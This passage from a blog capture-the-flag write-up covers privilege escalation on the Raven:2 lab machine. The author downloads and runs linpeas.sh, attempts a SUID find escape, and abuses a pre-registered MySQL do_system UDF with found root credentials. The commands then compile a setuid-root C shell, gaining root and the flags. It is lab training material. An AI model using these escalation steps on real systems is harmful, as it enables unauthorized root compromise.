\"/static/56ba32923f79fee1b450fd3ebbb2951c/efc66/raven-041344.png 885w\", \"/static/56ba32923f79fee1b450fd3ebbb2951c/00d43/raven-041344.png 1000w\"],\n    
\"sizes\": \"(max-width: 590px) 100vw, 590px\",\n    \"style\": {\n      \"width\": \"100%\",\n      \"height\": \"100%\",\n      \"margin\": \"0\",\n      \"verticalAlign\": \"middle\",\n      \"position\": \"absolute\",\n      \"top\": \"0\",\n      \"left\": \"0\"\n    },\n    \"loading\": \"lazy\"\n  })), \"\\n  \"), \"\\n    \")), mdx(\"h4\", null, \"Enumeration\"), mdx(\"p\", null, \"For privilege escalation part, I use \", mdx(\"a\", _extends({\n    parentName: \"p\"\n  }, {\n    \"href\": \"https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/\"\n  }), \"privilege-escalation-awesome-scripts-suite\"), \" scripts.\"), mdx(\"p\", null, \"Copy it to my current folder:\"), mdx(\"div\", {\n    \"className\": \"gatsby-highlight\",\n    \"data-language\": \"shell\"\n  }, mdx(\"pre\", _extends({\n    parentName: \"div\"\n  }, {\n    \"className\": \"language-shell\"\n  }), mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {\n    \"className\": \"language-shell\"\n  }), \"$ \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token function\"\n  }), \"cp\"), \" ~/Github/privilege-escalation-awesome-scripts-suite/linPEAS/linpeas.sh \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token builtin class-name\"\n  }), \".\")))), mdx(\"p\", null, \"Bring up a python http server at kali machine:\"), mdx(\"div\", {\n    \"className\": \"gatsby-highlight\",\n    \"data-language\": \"shell\"\n  }, mdx(\"pre\", _extends({\n    parentName: \"div\"\n  }, {\n    \"className\": \"language-shell\"\n  }), mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {\n    \"className\": \"language-shell\"\n  }), \"$ python3 -m http.server \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"80\")))), mdx(\"p\", null, \"At compromised machine side:\"), mdx(\"div\", {\n    \"className\": \"gatsby-highlight\",\n    \"data-language\": 
\"shell\"\n  }, mdx(\"pre\", _extends({\n    parentName: \"div\"\n  }, {\n    \"className\": \"language-shell\"\n  }), mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {\n    \"className\": \"language-shell\"\n  }), \"$ \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token builtin class-name\"\n  }), \"cd\"), \" /tmp \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token operator\"\n  }), \"&&\"), \" \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token function\"\n  }), \"wget\"), \" http://192.168.2.56/linpeas.sh\"))), mdx(\"p\", null, \"Run enumerlation script, and redirect its output to \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"reports.txt\"), \":\"), mdx(\"div\", {\n    \"className\": \"gatsby-highlight\",\n    \"data-language\": \"shell\"\n  }, mdx(\"pre\", _extends({\n    parentName: \"div\"\n  }, {\n    \"className\": \"language-shell\"\n  }), mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {\n    \"className\": \"language-shell\"\n  }), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token function\"\n  }), \"bash\"), \" linpeas.sh \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token operator\"\n  }), \">>\"), \" reports.txt\"))), mdx(\"p\", null, \"I always prefer to save the result of \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"linpeas.sh\"), \" into a file and retrieve it back to my kali machine, then I\\u2019m able to view it locally.\"), mdx(\"h2\", null, \"Privilege Escalation\"), mdx(\"p\", null, mdx(\"span\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"gatsby-resp-image-wrapper\",\n    \"style\": {\n      \"position\": \"relative\",\n      \"display\": \"block\",\n      \"marginLeft\": \"auto\",\n      
\"marginRight\": \"auto\",\n      \"maxWidth\": \"590px\"\n    }\n  }), \"\\n      \", mdx(\"a\", _extends({\n    parentName: \"span\"\n  }, {\n    \"className\": \"gatsby-resp-image-link\",\n    \"href\": \"/static/6500973362b4d0af97dc3caeb1fe950b/00d43/raven-042441.png\",\n    \"style\": {\n      \"display\": \"block\"\n    },\n    \"target\": \"_blank\",\n    \"rel\": \"noopener\"\n  }), \"\\n    \", mdx(\"span\", _extends({\n    parentName: \"a\"\n  }, {\n    \"className\": \"gatsby-resp-image-background-image\",\n    \"style\": {\n      \"paddingBottom\": \"60.13513513513513%\",\n      \"position\": \"relative\",\n      \"bottom\": \"0\",\n      \"left\": \"0\",\n      \"backgroundImage\": \"url('data:image/png;base64,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')\",\n      \"backgroundSize\": \"cover\",\n      \"display\": \"block\"\n    }\n  })), \"\\n  \", mdx(\"img\", _extends({\n    parentName: \"a\"\n  }, {\n    \"className\": \"gatsby-resp-image-image\",\n    \"alt\": \"linpeas\",\n    \"title\": \"linpeas\",\n    \"src\": \"/static/6500973362b4d0af97dc3caeb1fe950b/fcda8/raven-042441.png\",\n    \"srcSet\": [\"/static/6500973362b4d0af97dc3caeb1fe950b/12f09/raven-042441.png 148w\", \"/static/6500973362b4d0af97dc3caeb1fe950b/e4a3f/raven-042441.png 295w\", \"/static/6500973362b4d0af97dc3caeb1fe950b/fcda8/raven-042441.png 590w\", \"/static/6500973362b4d0af97dc3caeb1fe950b/efc66/raven-042441.png 885w\", \"/static/6500973362b4d0af97dc3caeb1fe950b/00d43/raven-042441.png 1000w\"],\n    \"sizes\": \"(max-width: 590px) 100vw, 590px\",\n    \"style\": {\n      \"width\": \"100%\",\n      \"height\": \"100%\",\n      \"margin\": \"0\",\n      \"verticalAlign\": \"middle\",\n      \"position\": \"absolute\",\n      \"top\": \"0\",\n      \"left\": \"0\"\n    },\n    \"loading\": \"lazy\"\n  })), \"\\n  \"), \"\\n    \")), mdx(\"p\", null, \"As linpes.sh colorizes its output, browse through that report is rather straightforward. 
I instantly noticed that it found the same database credentials as the ones I found manually, and a privesc vector \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"/usr/bin/find\"), \" with SUID enabled, plus a writable file located at \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"/usr/lib/mysql/plugin/1518.so\"), \" and a backup folder at \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"/var/backups\"), \" containing several juicy files like \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"shadow.bak\"), \", \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"passwd.bak\"), \", etc. Anyway, I hopped over to \", mdx(\"a\", _extends({\n    parentName: \"p\"\n  }, {\n    \"href\": \"https://gtfobins.github.io/\"\n  }), \"GTFOBins\"), \" and obtained a command \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"/usr/bin/find . -exec /bin/sh -p \\\\; -quit\"), \" to try to exploit this \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"find\"), \" binary to get a root shell. 
Since this machine is running on a rather outdated Debian version that attempt didn\\u2019t make out.\"), mdx(\"p\", null, mdx(\"span\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"gatsby-resp-image-wrapper\",\n    \"style\": {\n      \"position\": \"relative\",\n      \"display\": \"block\",\n      \"marginLeft\": \"auto\",\n      \"marginRight\": \"auto\",\n      \"maxWidth\": \"590px\"\n    }\n  }), \"\\n      \", mdx(\"a\", _extends({\n    parentName: \"span\"\n  }, {\n    \"className\": \"gatsby-resp-image-link\",\n    \"href\": \"/static/a61f0f2da2f2f165b02701a44824e18c/00d43/raven-042609.png\",\n    \"style\": {\n      \"display\": \"block\"\n    },\n    \"target\": \"_blank\",\n    \"rel\": \"noopener\"\n  }), \"\\n    \", mdx(\"span\", _extends({\n    parentName: \"a\"\n  }, {\n    \"className\": \"gatsby-resp-image-background-image\",\n    \"style\": {\n      \"paddingBottom\": \"60.13513513513513%\",\n      \"position\": \"relative\",\n      \"bottom\": \"0\",\n      \"left\": \"0\",\n      \"backgroundImage\": \"url('data:image/png;base64,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')\",\n      \"backgroundSize\": \"cover\",\n      \"display\": \"block\"\n    }\n  })), \"\\n  \", mdx(\"img\", _extends({\n    parentName: \"a\"\n  }, {\n    \"className\": \"gatsby-resp-image-image\",\n    \"alt\": \"database\",\n    \"title\": \"database\",\n    \"src\": \"/static/a61f0f2da2f2f165b02701a44824e18c/fcda8/raven-042609.png\",\n    \"srcSet\": [\"/static/a61f0f2da2f2f165b02701a44824e18c/12f09/raven-042609.png 148w\", \"/static/a61f0f2da2f2f165b02701a44824e18c/e4a3f/raven-042609.png 295w\", \"/static/a61f0f2da2f2f165b02701a44824e18c/fcda8/raven-042609.png 590w\", \"/static/a61f0f2da2f2f165b02701a44824e18c/efc66/raven-042609.png 885w\", \"/static/a61f0f2da2f2f165b02701a44824e18c/00d43/raven-042609.png 1000w\"],\n    \"sizes\": \"(max-width: 590px) 100vw, 590px\",\n    \"style\": {\n      \"width\": \"100%\",\n      \"height\": 
\"100%\",\n      \"margin\": \"0\",\n      \"verticalAlign\": \"middle\",\n      \"position\": \"absolute\",\n      \"top\": \"0\",\n      \"left\": \"0\"\n    },\n    \"loading\": \"lazy\"\n  })), \"\\n  \"), \"\\n    \")), mdx(\"p\", null, \"Then, I switch to this weird file \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"1518.o\"), \". Run a quick \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"strings\"), \" check on this shared library file:\"), mdx(\"div\", {\n    \"className\": \"gatsby-highlight\",\n    \"data-language\": \"shell\"\n  }, mdx(\"pre\", _extends({\n    parentName: \"div\"\n  }, {\n    \"className\": \"language-shell\"\n  }), mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {\n    \"className\": \"language-shell\"\n  }), \"$ strings /usr/lib/mysql/plugin/1518.o\"))), mdx(\"p\", null, \"Turns out this shared library has a \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"go_system\"), \" function in it, if it can be load into MySQL instance and previously obtained database credential is correct, then I\\u2019m pretty sure that I can launch a program with in that MySQL instance with root privilege.\"), mdx(\"p\", null, \"Connect to MySQL instance:\"), mdx(\"div\", {\n    \"className\": \"gatsby-highlight\",\n    \"data-language\": \"shell\"\n  }, mdx(\"pre\", _extends({\n    parentName: \"div\"\n  }, {\n    \"className\": \"language-shell\"\n  }), mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {\n    \"className\": \"language-shell\"\n  }), \"$ mysql -u root -p -h \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"127.0\"), \".0.1\"))), mdx(\"p\", null, \"And type in that database password, it worked! 
It\\u2019s a correct credential.\"), mdx(\"p\", null, \"First things first, let\\u2019s check out which databases this instance has:\"), mdx(\"div\", {\n    \"className\": \"gatsby-highlight\",\n    \"data-language\": \"mysql\"\n  }, mdx(\"pre\", _extends({\n    parentName: \"div\"\n  }, {\n    \"className\": \"language-mysql\"\n  }), mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {\n    \"className\": \"language-mysql\"\n  }), \"mysql> show databases;\\n+--------------------+\\n| Database           |\\n+--------------------+\\n| information_schema |\\n| mysql              |\\n| performance_schema |\\n| wordpress          |\\n+--------------------+\\n4 rows in set (0.01 sec)\"))), mdx(\"p\", null, \"Query the database version:\"), mdx(\"div\", {\n    \"className\": \"gatsby-highlight\",\n    \"data-language\": \"mysql\"\n  }, mdx(\"pre\", _extends({\n    parentName: \"div\"\n  }, {\n    \"className\": \"language-mysql\"\n  }), mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {\n    \"className\": \"language-mysql\"\n  }), \"mysql> SHOW VARIABLES LIKE \\\"%version%\\\";\\n+-------------------------+------------------+\\n| Variable_name           | Value            |\\n+-------------------------+------------------+\\n| innodb_version          | 5.5.60           |\\n| protocol_version        | 10               |\\n| slave_type_conversions  |                  |\\n| version                 | 5.5.60-0+deb8u1  |\\n| version_comment         | (Debian)         |\\n| version_compile_machine | x86_64           |\\n| version_compile_os      | debian-linux-gnu |\\n+-------------------------+------------------+\\n7 rows in set (0.00 sec)\"))), mdx(\"p\", null, \"I know this is a UDF exploitation, in which a user can execute a user-defined function from within the MySQL instance. 
So I went ahead and hopped over to my browser to google it, and found a blog post about launching a program from a MySQL database.\"), mdx(\"p\", null, \"Following its instructions, query the registered functions:\"), mdx(\"div\", {\n    \"className\": \"gatsby-highlight\",\n    \"data-language\": \"mysql\"\n  }, mdx(\"pre\", _extends({\n    parentName: \"div\"\n  }, {\n    \"className\": \"language-mysql\"\n  }), mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {\n    \"className\": \"language-mysql\"\n  }), \"mysql> select * from mysql.func\\n    -> ;\\n+-----------+-----+---------+----------+\\n| name      | ret | dl      | type     |\\n+-----------+-----+---------+----------+\\n| do_system |   2 | 1518.so | function |\\n+-----------+-----+---------+----------+\\n1 row in set (0.00 sec)\"))), mdx(\"p\", null, \"See, since the function is already registered, there is no need to load it again.\"), mdx(\"p\", null, \"Instead, run a quick \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"id\"), \" command and redirect its output to \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"/tmp/out\"), \":\"), mdx(\"div\", {\n    \"className\": \"gatsby-highlight\",\n    \"data-language\": \"mysql\"\n  }, mdx(\"pre\", _extends({\n    parentName: \"div\"\n  }, {\n    \"className\": \"language-mysql\"\n  }), mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {\n    \"className\": \"language-mysql\"\n  }), \"select do_system('id > /tmp/out; chown www-data.www-data /tmp/out');\"))), mdx(\"p\", null, \"Check its result by using \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"\\\\!\"), \" to execute a shell command within the MySQL command prompt:\"), mdx(\"div\", {\n    \"className\": \"gatsby-highlight\",\n    \"data-language\": \"mysql\"\n  }, mdx(\"pre\", _extends({\n    parentName: \"div\"\n  }, {\n    \"className\": 
\"language-mysql\"\n  }), mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {\n    \"className\": \"language-mysql\"\n  }), \"mysql> \\\\!\\nERROR:\\nUsage: \\\\! shell-command\\nmysql> \\\\! cat /tmp/out\\nuid=0(root) gid=0(root) groups=0(root)\"))), mdx(\"p\", null, \"Now, I can execute commands as a root user, next move is to spawn a root shell. Based on the previous discovery, the machine has gcc installed, I can compile a shell from C or upload a shell to this machine, then use \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"do_system\"), \" to \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"chown\"), \" to root and set its uid. Then, if I execute that binary it will give me a root shell.\"), mdx(\"p\", null, \"C code (/tmp/pe.c):\"), mdx(\"div\", {\n    \"className\": \"gatsby-highlight\",\n    \"data-language\": \"c\"\n  }, mdx(\"pre\", _extends({\n    parentName: \"div\"\n  }, {\n    \"className\": \"language-c\"\n  }), mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {\n    \"className\": \"language-c\"\n  }), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token macro property\"\n  }), \"#\", mdx(\"span\", _extends({\n    parentName: \"span\"\n  }, {\n    \"className\": \"token directive keyword\"\n  }), \"include\"), \" \", mdx(\"span\", _extends({\n    parentName: \"span\"\n  }, {\n    \"className\": \"token string\"\n  }), \"<stdio.h>\")), \"\\n\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token macro property\"\n  }), \"#\", mdx(\"span\", _extends({\n    parentName: \"span\"\n  }, {\n    \"className\": \"token directive keyword\"\n  }), \"include\"), \" \", mdx(\"span\", _extends({\n    parentName: \"span\"\n  }, {\n    \"className\": \"token string\"\n  }), \"<sys/types.h>\")), \"\\n\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    
\"className\": \"token macro property\"\n  }), \"#\", mdx(\"span\", _extends({\n    parentName: \"span\"\n  }, {\n    \"className\": \"token directive keyword\"\n  }), \"include\"), \" \", mdx(\"span\", _extends({\n    parentName: \"span\"\n  }, {\n    \"className\": \"token string\"\n  }), \"<unistd.h>\")), \"\\n\\n\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token keyword\"\n  }), \"int\"), \" \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token function\"\n  }), \"main\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \"(\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \")\"), \"\\n\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \"{\"), \"\\n\\t\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token function\"\n  }), \"setuid\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \"(\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"0\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \")\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \";\"), \" \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token function\"\n  }), \"setgid\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \"(\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token number\"\n  }), \"0\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \")\"), mdx(\"span\", _extends({\n 
   parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \";\"), \" \", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token function\"\n  }), \"system\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \"(\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token string\"\n  }), \"\\\"/bin/bash\\\"\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \")\"), mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \";\"), \"\\n\", mdx(\"span\", _extends({\n    parentName: \"code\"\n  }, {\n    \"className\": \"token punctuation\"\n  }), \"}\")))), mdx(\"p\", null, \"Put above C source code at \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"/tmp/pe.c\"), \", then compile it from MySQL prompt:\"), mdx(\"div\", {\n    \"className\": \"gatsby-highlight\",\n    \"data-language\": \"mysql\"\n  }, mdx(\"pre\", _extends({\n    parentName: \"div\"\n  }, {\n    \"className\": \"language-mysql\"\n  }), mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {\n    \"className\": \"language-mysql\"\n  }), \"select do_system('gcc /tmp/pe.c -o /tmp/pe');\"))), mdx(\"p\", null, \"Followed with set uid command:\"), mdx(\"div\", {\n    \"className\": \"gatsby-highlight\",\n    \"data-language\": \"mysql\"\n  }, mdx(\"pre\", _extends({\n    parentName: \"div\"\n  }, {\n    \"className\": \"language-mysql\"\n  }), mdx(\"code\", _extends({\n    parentName: \"pre\"\n  }, {\n    \"className\": \"language-mysql\"\n  }), \"select do_system('chmod u+s /tmp/pe');\"))), mdx(\"p\", null, mdx(\"span\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"gatsby-resp-image-wrapper\",\n    \"style\": {\n      \"position\": \"relative\",\n      \"display\": \"block\",\n 
     \"marginLeft\": \"auto\",\n      \"marginRight\": \"auto\",\n      \"maxWidth\": \"590px\"\n    }\n  }), \"\\n      \", mdx(\"a\", _extends({\n    parentName: \"span\"\n  }, {\n    \"className\": \"gatsby-resp-image-link\",\n    \"href\": \"/static/41aad6c6e1d9c4987c4675b476f19ddc/00d43/raven-052428.png\",\n    \"style\": {\n      \"display\": \"block\"\n    },\n    \"target\": \"_blank\",\n    \"rel\": \"noopener\"\n  }), \"\\n    \", mdx(\"span\", _extends({\n    parentName: \"a\"\n  }, {\n    \"className\": \"gatsby-resp-image-background-image\",\n    \"style\": {\n      \"paddingBottom\": \"60.13513513513513%\",\n      \"position\": \"relative\",\n      \"bottom\": \"0\",\n      \"left\": \"0\",\n      \"backgroundImage\": \"url('data:image/png;base64,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')\",\n      \"backgroundSize\": \"cover\",\n      \"display\": \"block\"\n    }\n  })), \"\\n  \", mdx(\"img\", _extends({\n    parentName: \"a\"\n  }, {\n    \"className\": \"gatsby-resp-image-image\",\n    \"alt\": \"compile\",\n    \"title\": \"compile\",\n    \"src\": \"/static/41aad6c6e1d9c4987c4675b476f19ddc/fcda8/raven-052428.png\",\n    \"srcSet\": [\"/static/41aad6c6e1d9c4987c4675b476f19ddc/12f09/raven-052428.png 148w\", \"/static/41aad6c6e1d9c4987c4675b476f19ddc/e4a3f/raven-052428.png 295w\", \"/static/41aad6c6e1d9c4987c4675b476f19ddc/fcda8/raven-052428.png 590w\", \"/static/41aad6c6e1d9c4987c4675b476f19ddc/efc66/raven-052428.png 885w\", \"/static/41aad6c6e1d9c4987c4675b476f19ddc/00d43/raven-052428.png 1000w\"],\n    \"sizes\": \"(max-width: 590px) 100vw, 590px\",\n    \"style\": {\n      \"width\": \"100%\",\n      \"height\": \"100%\",\n      \"margin\": \"0\",\n      \"verticalAlign\": \"middle\",\n      \"position\": \"absolute\",\n      \"top\": \"0\",\n      \"left\": \"0\"\n    },\n    \"loading\": \"lazy\"\n  })), \"\\n  \"), \"\\n    \")), mdx(\"h4\", null, \"Get flag4\"), mdx(\"p\", null, \"Execute \", mdx(\"code\", _extends({\n    
parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"/tmp/pe\"), \" from a low privilege shell, and successfully upgraded to root.\"), mdx(\"p\", null, mdx(\"span\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"gatsby-resp-image-wrapper\",\n    \"style\": {\n      \"position\": \"relative\",\n      \"display\": \"block\",\n      \"marginLeft\": \"auto\",\n      \"marginRight\": \"auto\",\n      \"maxWidth\": \"590px\"\n    }\n  }), \"\\n      \", mdx(\"a\", _extends({\n    parentName: \"span\"\n  }, {\n    \"className\": \"gatsby-resp-image-link\",\n    \"href\": \"/static/d3542be587ac7f76a427c26897f18719/00d43/raven-root.png\",\n    \"style\": {\n      \"display\": \"block\"\n    },\n    \"target\": \"_blank\",\n    \"rel\": \"noopener\"\n  }), \"\\n    \", mdx(\"span\", _extends({\n    parentName: \"a\"\n  }, {\n    \"className\": \"gatsby-resp-image-background-image\",\n    \"style\": {\n      \"paddingBottom\": \"60.13513513513513%\",\n      \"position\": \"relative\",\n      \"bottom\": \"0\",\n      \"left\": \"0\",\n      \"backgroundImage\": \"url('data:image/png;base64,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')\",\n      \"backgroundSize\": \"cover\",\n      \"display\": \"block\"\n    }\n  })), \"\\n  \", mdx(\"img\", _extends({\n    parentName: \"a\"\n  }, {\n    \"className\": \"gatsby-resp-image-image\",\n    \"alt\": \"root\",\n    \"title\": \"root\",\n    \"src\": \"/static/d3542be587ac7f76a427c26897f18719/fcda8/raven-root.png\",\n    \"srcSet\": [\"/static/d3542be587ac7f76a427c26897f18719/12f09/raven-root.png 148w\", \"/static/d3542be587ac7f76a427c26897f18719/e4a3f/raven-root.png 295w\", \"/static/d3542be587ac7f76a427c26897f18719/fcda8/raven-root.png 590w\", \"/static/d3542be587ac7f76a427c26897f18719/efc66/raven-root.png 885w\", \"/static/d3542be587ac7f76a427c26897f18719/00d43/raven-root.png 1000w\"],\n    \"sizes\": \"(max-width: 590px) 100vw, 590px\",\n    \"style\": {\n      \"width\": 
\"100%\",\n      \"height\": \"100%\",\n      \"margin\": \"0\",\n      \"verticalAlign\": \"middle\",\n      \"position\": \"absolute\",\n      \"top\": \"0\",\n      \"left\": \"0\"\n    },\n    \"loading\": \"lazy\"\n  })), \"\\n  \"), \"\\n    \")), mdx(\"h4\", null, \"Get flag3\"), mdx(\"p\", null, \"After flag4 obtained, I still didn\\u2019t know whereabouts of flag3. In that case, I head back to MySQL database again. Dig deeper into every tables from database \", mdx(\"code\", _extends({\n    parentName: \"p\"\n  }, {\n    \"className\": \"language-text\"\n  }), \"wordpress\"), \". And finally, find out flag3 is an image attachment file from a blog post, and its url is \", mdx(\"a\", _extends({\n    parentName: \"p\"\n  }, {\n    \"href\": \"http://raven.local/wordpress/wp-content/uploads/2018/11/flag3.png\"\n  }), \"http://raven.local/wordpress/wp-content/uploads/2018/11/flag3.png\"), \".\"), mdx(\"p\", null, \"Done! \\uD83C\\uDF89\"));\n}\n;\nMDXContent.isMDXComponent = true;","frontmatter":{"title":"Raven:2 Writeup","date":"July 08, 2020","description":null}}},"pageContext":{"slug":"/raven:2-writeup/","previous":{"fields":{"slug":"/msf-payload-analysis-i/"},"frontmatter":{"title":"MSF Payload Analysis I"}},"next":{"fields":{"slug":"/a-newbie-geolocation-practice/"},"frontmatter":{"title":"A Newbie Geolocation Practice"}}}}}